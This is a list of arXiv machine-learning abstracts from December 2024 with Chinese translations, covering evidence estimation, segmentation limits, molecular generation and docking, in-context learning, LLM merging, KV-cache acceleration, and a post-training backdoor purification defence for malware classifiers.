摘要: 我们提出了一种基于正规化流的新颖方法($floZ$),用于从已有的从未归一化后验分布中抽取的样本集中估计贝叶斯证据(及其数值不确定性)。我们在已知分析上的证据的分布上验证了它,最多可以达到15个参数空间维度,并与两种最先进的技术进行了比较,用于估计证据:嵌套抽样(将证据计算为其主要目标)和一个从后验样本中产生证据估计的$k$-最近邻技术。只要目标后验的代表性样本可用,我们的方法对具有尖锐特征的后验分布更加稳健,特别是在更高的维度下。对于简单的多变量高斯分布,我们展示了在高达$10^5$个后验样本的情况下,其在高达200个维度的准确性。$floZ$具有广泛的适用性,例如,可以从变分推断,马尔可夫链蒙特卡洛样本或任何其他提供样本及其从未归一化后验密度中的可能性的方法中估计证据。作为物理应用,我们使用$floZ$来计算GW150914的引力波数据中环形信号的第一声波的贝叶斯因子,结果与嵌套抽样结果取得了良好的一致性。
更新时间: 2024-12-05 15:27:14
领域: stat.ML,astro-ph.CO,cs.LG,gr-qc
Quantifying the Limits of Segment Anything Model: Analyzing Challenges in Segmenting Tree-Like and Low-Contrast Structures
Segment Anything Model (SAM) has shown impressive performance in interactive and zero-shot segmentation across diverse domains, suggesting that they have learned a general concept of "objects" from their large-scale training. However, we observed that SAM struggles with certain types of objects, particularly those featuring dense, tree-like structures and low textural contrast from their surroundings. These failure modes are critical for understanding its limitations in real-world use. In order to systematically examine this issue, we propose metrics to quantify two key object characteristics: tree-likeness and textural separability. Through extensive controlled synthetic experiments and testing on real datasets, we demonstrate that SAM's performance is noticeably correlated with these factors. We link these behaviors under the concept of "textural confusion", where SAM misinterprets local structure as global texture, leading to over-segmentation, or struggles to differentiate objects from similarly textured backgrounds. These findings offer the first quantitative framework to model SAM's challenges, providing valuable insights into its limitations and guiding future improvements for vision foundation models.
Updated: 2024-12-05 15:25:51
标题: 量化分段任意模型的限制:分析在分割类似树状和低对比度结构中的挑战
摘要: Segment Anything Model (SAM) 在各种领域的交互式和零样本分割中表现出色,表明它们已经从大规模训练中学习到了“对象”的一般概念。然而,我们观察到SAM在处理某些类型的对象时出现困难,特别是那些具有密集、树状结构和与周围环境低纹理对比度的对象。这些失败模式对于了解其在实际应用中的局限性至关重要。为了系统地研究这个问题,我们提出了用于量化两个关键对象特征的度量标准:树状度和纹理可分性。通过广泛的受控合成实验和对真实数据集的测试,我们展示了SAM的性能与这些因素明显相关。我们将这些行为联系在“纹理混淆”概念下,SAM将局部结构误解为全局纹理,导致过分割,或者难以区分对象和纹理相似的背景。这些发现提供了第一个定量框架来模拟SAM的挑战,为了解其限制并指导未来改进视觉基础模型提供了宝贵的见解。
更新时间: 2024-12-05 15:25:51
领域: cs.CV,cs.LG,eess.IV
LMDM:Latent Molecular Diffusion Model For 3D Molecule Generation
n this work, we propose a latent molecular diffusion model that can make the generated 3D molecules rich in diversity and maintain rich geometric features. The model captures the information of the forces and local constraints between atoms so that the generated molecules can maintain Euclidean transformation and high level of effectiveness and diversity. We also use the lowerrank manifold advantage of the latent variables of the latent model to fuse the information of the forces between atoms to better maintain the geometric equivariant properties of the molecules. Because there is no need to perform information fusion encoding in stages like traditional encoders and decoders, this reduces the amount of calculation in the back-propagation process. The model keeps the forces and local constraints of particle bonds in the latent variable space, reducing the impact of underfitting on the surface of the network on the large position drift of the particle geometry, so that our model can converge earlier. We introduce a distribution control variable in each backward step to strengthen exploration and improve the diversity of generation. In the experiment, the quality of the samples we generated and the convergence speed of the model have been significantly improved.
Updated: 2024-12-05 15:25:18
标题: LMDM: 用于3D分子生成的潜在分子扩散模型
摘要: 在这项工作中,我们提出了一种潜在的分子扩散模型,可以使生成的3D分子具有丰富的多样性,并保持丰富的几何特征。该模型捕获了原子之间的力量和局部约束的信息,使生成的分子能够保持欧几里德变换和高水平的有效性和多样性。我们还利用潜在模型的潜在变量的低秩流形优势,将原子之间的力量信息融合,以更好地保持分子的几何等变性质。由于不需要像传统的编码器和解码器那样在阶段中执行信息融合编码,这减少了反向传播过程中的计算量。该模型将粒子键的力量和局部约束保留在潜在变量空间中,减少了网络表面的欠拟合对粒子几何的大位置漂移的影响,使我们的模型能够更早地收敛。我们在每个反向步骤中引入一个分布控制变量,以加强探索和提高生成的多样性。在实验中,我们生成的样本的质量和模型的收敛速度显著提高了。
更新时间: 2024-12-05 15:25:18
领域: cs.LG
In-context learning and Occam's razor
A central goal of machine learning is generalization. While the No Free Lunch Theorem states that we cannot obtain theoretical guarantees for generalization without further assumptions, in practice we observe that simple models which explain the training data generalize best: a principle called Occam's razor. Despite the need for simple models, most current approaches in machine learning only minimize the training error, and at best indirectly promote simplicity through regularization or architecture design. Here, we draw a connection between Occam's razor and in-context learning: an emergent ability of certain sequence models like Transformers to learn at inference time from past observations in a sequence. In particular, we show that the next-token prediction loss used to train in-context learners is directly equivalent to a data compression technique called prequential coding, and that minimizing this loss amounts to jointly minimizing both the training error and the complexity of the model that was implicitly learned from context. Our theory and the empirical experiments we use to support it not only provide a normative account of in-context learning, but also elucidate the shortcomings of current in-context learning methods, suggesting ways in which they can be improved. We make our code available at https://github.com/3rdCore/PrequentialCode.
Updated: 2024-12-05 15:24:33
标题: 上下文学习与奥卡姆剃刀
摘要: 机器学习的一个中心目标是泛化。虽然“没有免费午餐”定理表明,我们无法在没有进一步假设的情况下获得泛化的理论保证,但在实践中,我们观察到解释训练数据的简单模型具有最佳泛化能力:这一原则被称为奥卡姆剃刀。尽管需要简单的模型,但目前大多数机器学习方法只是最小化训练误差,并且最多通过正则化或架构设计间接促进简单性。在这里,我们建立了奥卡姆剃刀和上下文学习之间的联系:某些序列模型(如Transformer)在推理时能够从序列中的过去观察中学习出现。特别地,我们展示了用于训练上下文学习者的下一个标记预测损失直接等同于一种称为预序编码的数据压缩技术,而最小化这种损失相当于联合最小化从上下文中隐式学习的模型的训练误差和复杂性。我们的理论和用来支持它的实证实验不仅提供了上下文学习的规范解释,而且阐明了当前上下文学习方法的不足之处,提出了改进方法。我们将我们的代码放在https://github.com/3rdCore/PrequentialCode。
更新时间: 2024-12-05 15:24:33
领域: cs.LG,cs.AI
Reachable Polyhedral Marching (RPM): An Exact Analysis Tool for Deep-Learned Control Systems
Neural networks are increasingly used in robotics as policies, state transition models, state estimation models, or all of the above. With these components being learned from data, it is important to be able to analyze what behaviors were learned and how this affects closed-loop performance. In this paper we take steps toward this goal by developing methods for computing control invariant sets and regions of attraction (ROAs) of dynamical systems represented as neural networks. We focus our attention on feedforward neural networks with the rectified linear unit (ReLU) activation, which are known to implement continuous piecewise-affine (PWA) functions. We describe the Reachable Polyhedral Marching (RPM) algorithm for enumerating the affine pieces of a neural network through an incremental connected walk. We then use this algorithm to compute exact forward and backward reachable sets, from which we provide methods for computing control invariant sets and ROAs. Our approach is unique in that we find these sets incrementally, without Lyapunov-based tools. In our examples we demonstrate the ability of our approach to find non-convex control invariant sets and ROAs on tasks with learned van der Pol oscillator and pendulum models. Further, we provide an accelerated algorithm for computing ROAs that leverages the incremental and connected enumeration of affine regions that RPM provides. We show this acceleration to lead to a 15x speedup in our examples. Finally, we apply our methods to find a set of states that are stabilized by an image-based controller for an aircraft runway control problem.
Updated: 2024-12-05 15:23:20
标题: 可达多面体行进(RPM):用于深度学习控制系统的精确分析工具
摘要: 神经网络在机器人学中越来越多地被用作策略、状态转换模型、状态估计模型或以上所有内容。由于这些组件是从数据中学习的,因此能够分析学习到的行为以及这如何影响闭环性能非常重要。在本文中,我们通过开发计算表示为神经网络的动态系统的控制不变集和吸引域(ROAs)的方法,朝着这个目标迈出了一步。我们将注意力集中在具有修正线性单元(ReLU)激活的前馈神经网络上,这些网络被认为实现连续分段仿射(PWA)函数。我们描述了可达多面体行进(RPM)算法,通过增量连接步行枚举神经网络的仿射片段。然后,我们使用该算法计算精确的前向和后向可达集,从中提供计算控制不变集和ROAs的方法。我们的方法独特之处在于,我们逐步找到这些集合,而无需利用李亚普诺夫工具。在我们的示例中,我们展示了我们的方法在具有学习的van der Pol振荡器和摆模型的任务中找到非凸控制不变集和ROAs的能力。此外,我们提供了一种用于计算ROAs的加速算法,利用RPM提供的增量和连接枚举仿射区域。我们展示了这种加速在我们的示例中导致15倍的加速。最后,我们应用我们的方法找到了由基于图像的控制器稳定的飞机跑道控制问题的状态集。
更新时间: 2024-12-05 15:23:20
领域: cs.LG,cs.AI,cs.RO,cs.SY,eess.SY
A Complexity-Based Theory of Compositionality
Compositionality is believed to be fundamental to intelligence. In humans, it underlies the structure of thought, language, and higher-level reasoning. In AI, compositional representations can enable a powerful form of out-of-distribution generalization, in which a model systematically adapts to novel combinations of known concepts. However, while we have strong intuitions about what compositionality is, there currently exists no formal definition for it that is measurable and mathematical. Here, we propose such a definition, which we call representational compositionality, that accounts for and extends our intuitions about compositionality. The definition is conceptually simple, quantitative, grounded in algorithmic information theory, and applicable to any representation. Intuitively, representational compositionality states that a compositional representation satisfies three properties. First, it must be expressive. Second, it must be possible to re-describe the representation as a function of discrete symbolic sequences with re-combinable parts, analogous to sentences in natural language. Third, the function that relates these symbolic sequences to the representation, analogous to semantics in natural language, must be simple. Through experiments on both synthetic and real world data, we validate our definition of compositionality and show how it unifies disparate intuitions from across the literature in both AI and cognitive science. We also show that representational compositionality, while theoretically intractable, can be readily estimated using standard deep learning tools. Our definition has the potential to inspire the design of novel, theoretically-driven models that better capture the mechanisms of compositional thought.
Updated: 2024-12-05 15:20:28
标题: 基于复杂性的组合性理论
摘要: 组成性被认为是智能的基础。在人类身上,它构成了思维、语言和高层推理的结构。在人工智能领域,组成性表征可以实现一种强大的超出分布范化,模型可以系统地适应已知概念的新组合。然而,尽管我们对组成性有强烈直觉,但目前还没有可测量和数学化的正式定义。在这里,我们提出了一种名为代表性组成性的定义,它考虑并扩展了我们对组成性的直觉。这个定义在概念上简单,定量的,基于算法信息理论,适用于任何表征。直观地说,代表性组成性表明组成性表征满足三个特性。首先,它必须是表达力强的。其次,必须能够将表征重新描述为由可重组部分组成的离散符号序列的函数,类似于自然语言中的句子。第三,将这些符号序列与表征相关联的函数,类似于自然语言中的语义,必须简单。通过对合成和真实世界数据的实验,我们验证了我们对组成性的定义,并展示了它如何统一了人工智能和认知科学文献中各种不同的直觉。我们还展示了代表性组成性,虽然在理论上是难以处理的,但可以通过标准深度学习工具轻松估计。我们的定义有潜力激发出基于理论的全新模型的设计,更好地捕捉组成思维的机制。
更新时间: 2024-12-05 15:20:28
领域: cs.CL,cs.AI,cs.LG
Cross-domain and Cross-dimension Learning for Image-to-Graph Transformers
Direct image-to-graph transformation is a challenging task that involves solving object detection and relationship prediction in a single model. Due to this task's complexity, large training datasets are rare in many domains, making the training of deep-learning methods challenging. This data sparsity necessitates transfer learning strategies akin to the state-of-the-art in general computer vision. In this work, we introduce a set of methods enabling cross-domain and cross-dimension learning for image-to-graph transformers. We propose (1) a regularized edge sampling loss to effectively learn object relations in multiple domains with different numbers of edges, (2) a domain adaptation framework for image-to-graph transformers aligning image- and graph-level features from different domains, and (3) a projection function that allows using 2D data for training 3D transformers. We demonstrate our method's utility in cross-domain and cross-dimension experiments, where we utilize labeled data from 2D road networks for simultaneous learning in vastly different target domains. Our method consistently outperforms standard transfer learning and self-supervised pretraining on challenging benchmarks, such as retinal or whole-brain vessel graph extraction.
Updated: 2024-12-05 15:19:47
标题: 图像到图形转换器的跨域和跨维度学习
摘要: 直接图像到图形转换是一项具有挑战性的任务,涉及在单个模型中解决目标检测和关系预测。由于这个任务的复杂性,在许多领域中很少有大型训练数据集,使得深度学习方法的训练具有挑战性。这种数据稀疏性需要类似于通用计算机视觉中的最先进的迁移学习策略。在这项工作中,我们引入了一组方法,使图像到图形转换器能够进行跨领域和跨维度学习。我们提出了(1)一种正则化的边采样损失,以有效学习具有不同边数的多个领域中的对象关系,(2)一种适用于图像到图形转换器的领域自适应框架,可以对齐不同领域的图像和图形级特征,以及(3)一种投影函数,允许使用二维数据训练三维转换器。我们在跨领域和跨维度实验中展示了我们的方法的实用性,我们利用来自2D道路网络的标记数据,同时在大不同目标领域中进行学习。我们的方法在具有挑战性的基准测试中持续优于标准迁移学习和自监督预训练,例如视网膜或整个大脑血管图提取。
更新时间: 2024-12-05 15:19:47
领域: cs.CV,cs.AI
A History of Philosophy in Colombia through Topic Modelling
Data-driven approaches to philosophy have emerged as a valuable tool for studying the history of the discipline. However, most studies in this area have focused on a limited number of journals from specific regions and subfields. We expand the scope of this research by applying dynamic topic modelling techniques to explore the history of philosophy in Colombia and Latin America. Our study examines the Colombian philosophy journal Ideas y Valores, founded in 1951 and currently one of the most influential academic philosophy journals in the region. By analyzing the evolution of topics across the journal's history, we identify various trends and specific dynamics in philosophical discourse within the Colombian and Latin American context. Our findings reveal that the most prominent topics are value theory (including ethics, political philosophy, and aesthetics), epistemology, and the philosophy of science. We also trace the evolution of articles focusing on the historical and interpretive aspects of philosophical texts, and we note a notable emphasis on German philosophers such as Kant, Husserl, and Hegel on various topics throughout the journal's lifetime. Additionally, we investigate whether articles with a historical focus have decreased over time due to editorial pressures. Our analysis suggests no significant decline in such articles. Finally, we propose ideas for extending this research to other Latin American journals and suggest improvements for natural language processing workflows in non-English languages.
Updated: 2024-12-05 15:14:16
标题: 哥伦比亚哲学史的主题建模研究
摘要: 数据驱动的哲学方法已经成为研究学科历史的有价值工具。然而,该领域的大多数研究集中在特定地区和子领域的有限数量期刊上。我们通过应用动态主题建模技术,扩展了这一研究的范围,探索了哲学在哥伦比亚和拉丁美洲的历史。我们的研究考察了哥伦比亚哲学期刊《思想与价值》,该期刊成立于1951年,目前是该地区最具影响力的学术哲学期刊之一。通过分析该期刊历史上主题的发展,我们发现了哥伦比亚和拉丁美洲哲学话语中的各种趋势和特定动态。我们的研究结果显示,最突出的主题是价值理论(包括伦理学、政治哲学和美学)、认识论和科学哲学。我们还追溯了关注哲学文本历史和解释方面的文章的发展,并注意到在期刊历史上关于康德、胡塞尔和黑格尔等德国哲学家的各种主题的强调。此外,我们调查了由于编辑压力导致历史焦点文章数量是否随时间减少。我们的分析表明,这类文章并没有显著下降。最后,我们提出了将这项研究扩展到其他拉丁美洲期刊的想法,并提出了改进非英语语言自然语言处理工作流程的建议。
更新时间: 2024-12-05 15:14:16
领域: cs.LG,cs.CL,cs.DL
DEIM: DETR with Improved Matching for Fast Convergence
We introduce DEIM, an innovative and efficient training framework designed to accelerate convergence in real-time object detection with Transformer-based architectures (DETR). To mitigate the sparse supervision inherent in one-to-one (O2O) matching in DETR models, DEIM employs a Dense O2O matching strategy. This approach increases the number of positive samples per image by incorporating additional targets, using standard data augmentation techniques. While Dense O2O matching speeds up convergence, it also introduces numerous low-quality matches that could affect performance. To address this, we propose the Matchability-Aware Loss (MAL), a novel loss function that optimizes matches across various quality levels, enhancing the effectiveness of Dense O2O. Extensive experiments on the COCO dataset validate the efficacy of DEIM. When integrated with RT-DETR and D-FINE, it consistently boosts performance while reducing training time by 50%. Notably, paired with RT-DETRv2, DEIM achieves 53.2% AP in a single day of training on an NVIDIA 4090 GPU. Additionally, DEIM-trained real-time models outperform leading real-time object detectors, with DEIM-D-FINE-L and DEIM-D-FINE-X achieving 54.7% and 56.5% AP at 124 and 78 FPS on an NVIDIA T4 GPU, respectively, without the need for additional data. We believe DEIM sets a new baseline for advancements in real-time object detection. Our code and pre-trained models are available at https://github.com/ShihuaHuang95/DEIM.
Updated: 2024-12-05 15:10:13
标题: DEIM:具有改进匹配的DETR以实现快速收敛
摘要: 我们介绍了DEIM,这是一个创新且高效的训练框架,旨在加速基于Transformer架构(DETR)的实时目标检测的收敛。为了缓解DETR模型中一对一(O2O)匹配中固有的稀疏监督,DEIM采用了一种密集的O2O匹配策略。该方法通过使用标准数据增强技术,增加每个图像的正样本数量,引入了额外的目标。虽然密集的O2O匹配加快了收敛速度,但也引入了许多可能影响性能的低质量匹配。为了解决这个问题,我们提出了一种新颖的损失函数Matchability-Aware Loss(MAL),优化了各种质量水平的匹配,增强了密集的O2O的有效性。在COCO数据集上进行的大量实验验证了DEIM的有效性。当与RT-DETR和D-FINE集成时,它始终提升性能,同时将训练时间缩短了50%。值得注意的是,与RT-DETRv2配对,DEIM在一天内在NVIDIA 4090 GPU上实现了53.2%的AP。此外,经过DEIM训练的实时模型胜过了主要的实时目标检测器,DEIM-D-FINE-L和DEIM-D-FINE-X在NVIDIA T4 GPU上分别以124和78 FPS实现了54.7%和56.5%的AP,而无需额外数据。我们相信DEIM为实时目标检测的进展设立了新的基线。我们的代码和预训练模型可以在https://github.com/ShihuaHuang95/DEIM上获取。
更新时间: 2024-12-05 15:10:13
领域: cs.CV,cs.AI
HyperMARL: Adaptive Hypernetworks for Multi-Agent RL
Balancing individual specialisation and shared behaviours is a critical challenge in multi-agent reinforcement learning (MARL). Existing methods typically focus on encouraging diversity or leveraging shared representations. Full parameter sharing (FuPS) improves sample efficiency but struggles to learn diverse behaviours when required, while no parameter sharing (NoPS) enables diversity but is computationally expensive and sample inefficient. To address these challenges, we introduce HyperMARL, a novel approach using hypernetworks to balance efficiency and specialisation. HyperMARL generates agent-specific actor and critic parameters, enabling agents to adaptively exhibit diverse or homogeneous behaviours as needed, without modifying the learning objective or requiring prior knowledge of the optimal diversity. Furthermore, HyperMARL decouples agent-specific and state-based gradients, which empirically correlates with reduced policy gradient variance, potentially offering insights into its ability to capture diverse behaviours. Across MARL benchmarks requiring homogeneous, heterogeneous, or mixed behaviours, HyperMARL consistently matches or outperforms FuPS, NoPS, and diversity-focused methods, achieving NoPS-level diversity with a shared architecture. These results highlight the potential of hypernetworks as a versatile approach to the trade-off between specialisation and shared behaviours in MARL.
Updated: 2024-12-05 15:09:51
标题: 超MARL:用于多智能体强化学习的自适应超网络
摘要: 在多智能体强化学习(MARL)中,平衡个体专业化和共享行为是一个关键挑战。现有方法通常专注于鼓励多样性或利用共享表示。全参数共享(FuPS)提高了样本效率,但在需要时很难学习多样化的行为,而无参数共享(NoPS)虽然能够实现多样性,但计算成本高且样本效率低。为了解决这些挑战,我们引入了HyperMARL,这是一种使用超网络来平衡效率和专业化的新方法。HyperMARL生成特定于代理的actor和critic参数,使代理能够根据需要适应性地展示多样化或同质化的行为,而无需修改学习目标或需要先验知识来确定最佳多样性。此外,HyperMARL解耦了特定于代理和基于状态的梯度,这在经验上与减少策略梯度方差相关,可能为其捕捉多样化行为的能力提供见解。在需要同质化、异质化或混合行为的MARL基准测试中,HyperMARL始终与FuPS、NoPS和以多样性为重点的方法相匹配或表现更好,实现了与NoPS水平多样性的共享架构。这些结果突显了超网络作为在MARL中平衡专业化与共享行为之间权衡的多功能方法的潜力。
更新时间: 2024-12-05 15:09:51
领域: cs.LG,cs.AI,cs.MA
Model-GLUE: Democratized LLM Scaling for A Large Model Zoo in the Wild
As Large Language Models (LLMs) excel across tasks and specialized domains, scaling LLMs based on existing models has garnered significant attention, which faces the challenge of decreasing performance when combining disparate models. Various techniques have been proposed for the aggregation of pre-trained LLMs, including model merging, Mixture-of-Experts, and stacking. Despite their merits, a comprehensive comparison and synergistic application of them to a diverse model zoo is yet to be adequately addressed. In light of this research gap, this paper introduces Model-GLUE, a holistic LLM scaling guideline. First, our work starts with a benchmarking of existing LLM scaling techniques, especially selective merging, and variants of mixture. Utilizing the insights from the benchmark results, we formulate an optimal strategy for the selection and aggregation of a heterogeneous model zoo characterizing different architectures and initialization.Our methodology involves the clustering of mergeable models and optimal merging strategy selection, and the integration of clusters through a model mixture. Finally, evidenced by our experiments on a diverse Llama-2-based model zoo, Model-GLUE shows an average performance enhancement of 5.61%, achieved without additional training. Codes are available at: https://github.com/Model-GLUE/Model-GLUE.
Updated: 2024-12-05 15:08:56
标题: Model-GLUE: 野外大型模型动物园中民主化的LLM扩展
摘要: 随着大型语言模型(LLMs)在各种任务和专业领域表现出色,基于现有模型扩展LLMs引起了极大关注,但在组合不同模型时却面临性能下降的挑战。已经提出了各种技术用于集成预训练的LLMs,包括模型合并、专家混合和堆叠。尽管它们各有优点,但对它们进行全面比较并协同应用到多样化的模型库中仍未得到充分解决。鉴此研究空白,本文介绍了Model-GLUE,一个全面的LLM扩展指南。首先,我们的工作从对现有LLM扩展技术的基准测试开始,特别是选择性合并和混合的变体。利用基准测试结果的见解,我们制定了一种优化策略,用于选择和集成不同架构和初始化特征的异构模型库。我们的方法涉及可合并模型的聚类和最佳合并策略选择,以及通过模型混合集成簇。最后,通过我们在多样化的基于Llama-2的模型库上进行的实验,Model-GLUE表现出平均性能提升5.61%,而无需额外训练。代码可在以下网址获取:https://github.com/Model-GLUE/Model-GLUE。
更新时间: 2024-12-05 15:08:56
领域: cs.LG,cs.AI,cs.CL
Foundations of the Theory of Performance-Based Ranking
Ranking entities such as algorithms, devices, methods, or models based on their performances, while accounting for application-specific preferences, is a challenge. To address this challenge, we establish the foundations of a universal theory for performance-based ranking. First, we introduce a rigorous framework built on top of both the probability and order theories. Our new framework encompasses the elements necessary to (1) manipulate performances as mathematical objects, (2) express which performances are worse than or equivalent to others, (3) model tasks through a variable called satisfaction, (4) consider properties of the evaluation, (5) define scores, and (6) specify application-specific preferences through a variable called importance. On top of this framework, we propose the first axiomatic definition of performance orderings and performance-based rankings. Then, we introduce a universal parametric family of scores, called ranking scores, that can be used to establish rankings satisfying our axioms, while considering application-specific preferences. Finally, we show, in the case of two-class classification, that the family of ranking scores encompasses well-known performance scores, including the accuracy, the true positive rate (recall, sensitivity), the true negative rate (specificity), the positive predictive value (precision), and F1. However, we also show that some other scores commonly used to compare classifiers are unsuitable to derive performance orderings satisfying the axioms. Therefore, this paper provides the computer vision and machine learning communities with a rigorous framework for evaluating and ranking entities.
Updated: 2024-12-05 15:05:25
标题: 性能基础排名理论的基础
摘要: 排名实体,如算法、设备、方法或模型,基于它们的性能,同时考虑特定应用的偏好,是一项挑战。为了解决这一挑战,我们建立了一个基于性能的排名的通用理论基础。首先,我们引入了一个严格的框架,建立在概率和顺序理论之上。我们的新框架包括必要的元素,可以(1)将性能作为数学对象进行操纵,(2)表达哪些性能比其他性能更差或等同,(3)通过一个称为满意度的变量对任务进行建模,(4)考虑评估的特性,(5)定义得分,(6)通过一个称为重要性的变量指定特定应用的偏好。在这个框架之上,我们提出了性能排序和基于性能的排名的第一个公理化定义。然后,我们介绍了一种称为排名得分的通用参数家族,可以用来建立满足我们公理的排名,同时考虑特定应用的偏好。最后,我们展示,在两类分类的情况下,排名得分家族包含了一些众所周知的性能得分,包括准确率、真正例率(召回率、敏感度)、真负例率(特异性)、正预测值(精度)和F1。然而,我们也展示了一些其他常用于比较分类器的得分不适合推导满足公理的性能排序。因此,本文为计算机视觉和机器学习社区提供了一个严格的框架,用于评估和排名实体。
更新时间: 2024-12-05 15:05:25
领域: cs.LG,cs.CV,cs.PF
PBP: Post-training Backdoor Purification for Malware Classifiers
In recent years, the rise of machine learning (ML) in cybersecurity has brought new challenges, including the increasing threat of backdoor poisoning attacks on ML malware classifiers. For instance, adversaries could inject malicious samples into public malware repositories, contaminating the training data and potentially misclassifying malware by the ML model. Current countermeasures predominantly focus on detecting poisoned samples by leveraging disagreements within the outputs of a diverse set of ensemble models on training data points. However, these methods are not suitable for scenarios where Machine Learning-as-a-Service (MLaaS) is used or when users aim to remove backdoors from a model after it has been trained. Addressing this scenario, we introduce PBP, a post-training defense for malware classifiers that mitigates various types of backdoor embeddings without assuming any specific backdoor embedding mechanism. Our method exploits the influence of backdoor attacks on the activation distribution of neural networks, independent of the trigger-embedding method. In the presence of a backdoor attack, the activation distribution of each layer is distorted into a mixture of distributions. By regulating the statistics of the batch normalization layers, we can guide a backdoored model to perform similarly to a clean one. Our method demonstrates substantial advantages over several state-of-the-art methods, as evidenced by experiments on two datasets, two types of backdoor methods, and various attack configurations. Notably, our approach requires only a small portion of the training data -- only 1\% -- to purify the backdoor and reduce the attack success rate from 100\% to almost 0\%, a 100-fold improvement over the baseline methods. Our code is available at \url{https://github.com/judydnguyen/pbp-backdoor-purification-official}.
Updated: 2024-12-05 15:03:26
标题: PBP: 后训练后门净化用于恶意软件分类器
摘要: 近年来,机器学习(ML)在网络安全领域的崛起带来了新的挑战,其中包括对ML恶意软件分类器进行后门污染攻击的威胁不断增加。例如,对手可以将恶意样本注入公共恶意软件库,污染训练数据,并可能使ML模型对恶意软件进行错误分类。当前的对策主要集中在通过利用一组多样化集合模型在训练数据点上的输出的差异来检测被污染的样本。然而,这些方法并不适用于使用机器学习即服务(MLaaS)的情况,或者当用户在模型训练后试图消除后门时。针对这种情况,我们引入了PBP,这是一种针对恶意软件分类器的后训练防御方法,可以减轻各种类型的后门嵌入,而不假设任何特定的后门嵌入机制。我们的方法利用了后门攻击对神经网络激活分布的影响,独立于触发嵌入方法。在存在后门攻击的情况下,每一层的激活分布会扭曲成一种分布的混合物。通过调节批量归一化层的统计数据,我们可以引导一个带有后门的模型表现类似于一个干净的模型。我们的方法在两个数据集、两种后门方法和各种攻击配置的实验中,显示出明显的优势,明显优于几种最先进的方法。值得注意的是,我们的方法只需要训练数据的一小部分 -- 只有1\% -- 就能净化后门,将攻击成功率从100\%降低到几乎为0\%,是对基准方法的100倍改进。我们的代码可在以下链接获取:https://github.com/judydnguyen/pbp-backdoor-purification-official。
更新时间: 2024-12-05 15:03:26
领域: cs.LG,cs.AI,cs.CR
SwiftKV: Fast Prefill-Optimized Inference with Knowledge-Preserving Model Transformation
LLM inference for popular enterprise use cases, such as summarization, RAG, and code-generation, typically observes orders of magnitude longer prompt lengths than generation lengths. This characteristic leads to high cost of prefill and increased response latency. In this paper, we present SwiftKV, a novel model transformation and distillation procedure specifically designed to reduce the time and cost of processing prompt tokens while preserving high quality of generated tokens. SwiftKV combines three key mechanisms: i) SingleInputKV, which prefills later layers' KV cache using a much earlier layer's output, allowing prompt tokens to skip much of the model computation, ii) AcrossKV, which merges the KV caches of neighboring layers to reduce the memory footprint and support larger batch size for higher throughput, and iii) a knowledge-preserving distillation procedure that can adapt existing LLMs for SwiftKV with minimal accuracy impact and low compute and data requirement. For Llama-3.1-8B and 70B, SwiftKV reduces the compute requirement of prefill by 50% and the memory requirement of the KV cache by 62.5% while incurring minimum quality degradation across a wide range of tasks. In the end-to-end inference serving using an optimized vLLM implementation, SwiftKV realizes up to 2x higher aggregate throughput and 60% lower time per output token. It can achieve a staggering 560 TFlops/GPU of normalized inference throughput, which translates to 16K tokens/s for Llama-3.1-70B in 16-bit precision on 4x H100 GPUs. Our training, inference, and model implementations are open-sourced and can be found through https://huggingface.co/collections/Snowflake/swiftkv-models-674f7d7474eb789e185d31cb.
Updated: 2024-12-05 14:56:56
标题: SwiftKV:具有知识保留模型转换的快速预填充优化推理
摘要: 基于LLM的推断在流行的企业用例中,如摘要、RAG和代码生成,通常观察到比生成长度长几个数量级的提示长度。这种特征导致预先填充的成本高,响应延迟增加。在本文中,我们提出了SwiftKV,一种新颖的模型转换和蒸馏过程,专门设计用于减少处理提示标记的时间和成本,同时保持生成标记的高质量。SwiftKV结合了三个关键机制:i) SingleInputKV,使用较早层的输出来预填充后续层的KV缓存,从而使提示标记跳过大部分模型计算,ii) AcrossKV,合并相邻层的KV缓存以减少内存占用量并支持更大的批处理大小以实现更高的吞吐量,以及iii) 一种保留知识的蒸馏过程,可以使现有的LLM适应SwiftKV,同时对准确性影响最小且计算和数据需求低。对于Llama-3.1-8B和70B,SwiftKV将预填充的计算需求降低了50%,将KV缓存的内存需求降低了62.5%,同时在各种任务中产生最小的质量降级。在使用经过优化的vLLM实现的端到端推断服务中,SwiftKV实现了高达2倍的综合吞吐量和60%更低的每个输出标记的时间。在4x H100 GPU上以16位精度进行Llama-3.1-70B每秒可实现16K标记,其规范化推断吞吐量高达560 TFlops/GPU。我们的培训、推断和模型实现是开源的,可以通过以下链接找到:https://huggingface.co/collections/Snowflake/swiftkv-models-674f7d7474eb789e185d31cb。
更新时间: 2024-12-05 14:56:56
领域: cs.LG,cs.AI,cs.CL
Dockformer: A transformer-based molecular docking paradigm for large-scale virtual screening
Molecular docking is a crucial step in drug development, which enables the virtual screening of compound libraries to identify potential ligands that target proteins of interest. However, the computational complexity of traditional docking models increases as the size of the compound library increases. Recently, deep learning algorithms can provide data-driven research and development models to increase the speed of the docking process. Unfortunately, few models can achieve superior screening performance compared to that of traditional models. Therefore, a novel deep learning-based docking approach named Dockformer is introduced in this study. Dockformer leverages multimodal information to capture the geometric topology and structural knowledge of molecules and can directly generate binding conformations with the corresponding confidence measures in an end-to-end manner. The experimental results show that Dockformer achieves success rates of 90.53% and 82.71% on the PDBbind core set and PoseBusters benchmarks, respectively, and more than a 100-fold increase in the inference process speed, outperforming almost all state-of-the-art docking methods. In addition, the ability of Dockformer to identify the main protease inhibitors of coronaviruses is demonstrated in a real-world virtual screening scenario. Considering its high docking accuracy and screening efficiency, Dockformer can be regarded as a powerful and robust tool in the field of drug design.
Updated: 2024-12-05 14:56:30
标题: Dockformer:一种基于变压器的大规模虚拟筛选分子对接范式
摘要: 分子对接是药物开发中至关重要的一步,它可以通过虚拟筛选化合物库来识别潜在的靶向感兴趣蛋白的配体。然而,传统对接模型的计算复杂性随着化合物库的增加而增加。最近,深度学习算法可以提供数据驱动的研究和开发模型,以提高对接过程的速度。不幸的是,与传统模型相比,很少有模型能够实现更优越的筛选性能。因此,在本研究中引入了一种名为Dockformer的新型基于深度学习的对接方法。Dockformer利用多模态信息捕获分子的几何拓扑和结构知识,并可以以端到端的方式直接生成具有相应置信度的结合构象。实验结果显示,Dockformer在PDBbind核心集和PoseBusters基准测试中分别实现了90.53%和82.71%的成功率,并在推断过程速度上实现了100倍以上的增加,优于几乎所有最先进的对接方法。此外,Dockformer在真实世界的虚拟筛选场景中展示了识别冠状病毒主蛋白酶抑制剂的能力。考虑到其高对接准确性和筛选效率,Dockformer可以被视为药物设计领域中强大而稳健的工具。
更新时间: 2024-12-05 14:56:30
